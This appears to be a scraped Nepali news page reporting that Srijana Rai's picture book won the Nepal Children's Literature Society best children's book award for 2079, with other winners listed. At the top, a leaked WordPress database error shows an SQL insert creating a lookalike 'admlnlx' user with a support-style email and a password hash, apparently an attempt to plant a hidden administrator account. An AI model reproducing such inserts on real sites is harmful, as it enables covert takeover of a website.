WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$ByEyzUalyEt./VIBczA9prICQhdnhI1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2025-12-28 12:10:45', '', 'admlnlx', 'admlnlx')

“साङ्केनकाे खुल्दुली” लाई सर्बोत्कृष्ट बाल पुस्तक पुरस्कार – Gaule Khabar

“साङ्केनकाे खुल्दुली” लाई सर्बोत्कृष्ट बाल पुस्तक पुरस्कार

“साङ्केनकाे खुल्दुली” लाई सर्बोत्कृष्ट बाल पुस्तक पुरस्कार

काठमाडौ । सृजना राई द्वारा लिखित बालकथा “साङ्केनकाे खुल्दुली” (चित्रकथा) नेपाल बाल साहित्य समाज ( नेबासास ) ले २०७९ (८ बर्ष माथि ) को लागि सर्बोत्कृष्ट कृति घोषणा गरेको छ । “साङ्केनकाे खुल्दुली” कोपिला किताबले प्रकाशन गरेको हो । उक्त चित्रकथामा सुरज राईको चित्र कला रहेको छ। साहित्य क्षेत्रमा आफुलाई उध्याइरहेकी सृजनाको यो पहिलो प्रकशित बालकथा हो भने प्रदेश नं १ का महिला साहित्यकारहरुको संयुुक्त कबिता संग्रह “अजम्बरी अक्षरहरु” मा उनकाे कविता “मानबताको खोजि” प्रकाशन भएको थियो ।
गीत गजल कबिता लघुकथाहरुमा कलम चलाइरहने सृजना राईका धेरै सिर्जनाहरु बिभिन्न कारण बस डायरीमा नै सिमित रहेकाछ्न । अब भने आफ्ना सिर्जनाहरु डयरीमा मात्र सिमित राखेर आफुले तिनिहरुलाई अन्याय पो गरेँ कि ? भन्ने आफुलाई महशुष हुन थालेको बताउने सृजना यो पुरस्कारले भबिस्यमा आफ्ना कृतिहरुलाई प्रकाशन गर्ने आँट बढाएको बताउँछिन । नेबासासले ६०७९ को (८ बर्ष मुनिको लागि ) इन्द्र चौधरीको “नयाँ बनपाले” लाई सर्बोत्कृष्ट कृति घोषणा गरेको छ भने चित्र तर्फ ” य: मरी ” चित्र पुस्तकका लगि चित्रकार कृषा ताम्राकारलाई सर्बोत्कृष्ट चित्र घोषणा गरेकोछ ।
यस्तै २०७८ को नेबासास सर्बोत्कृष्ट बाल पुस्तक ( ८ बर्ष माथि ) का लागि हरि खनालको ” आमा ” ( बालउपन्यास) ,
( ८ बर्ष मुनिको लागि ) मित्र पंज्ञानीको “नानी र चरी” ( बालकब्य ) र चित्रतर्फ चित्रकार कलाग्रज बी को चित्रकला “बाघसँग जम्काभेट” (चित्रकथा) लाई सर्बोत्कृष्ट घोषित गरेकोछ।
सृजनाका सिर्जनाहरु डयरीमा मात्र सिमित नहुन प्रकाशनमा आउन शुभकामना

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका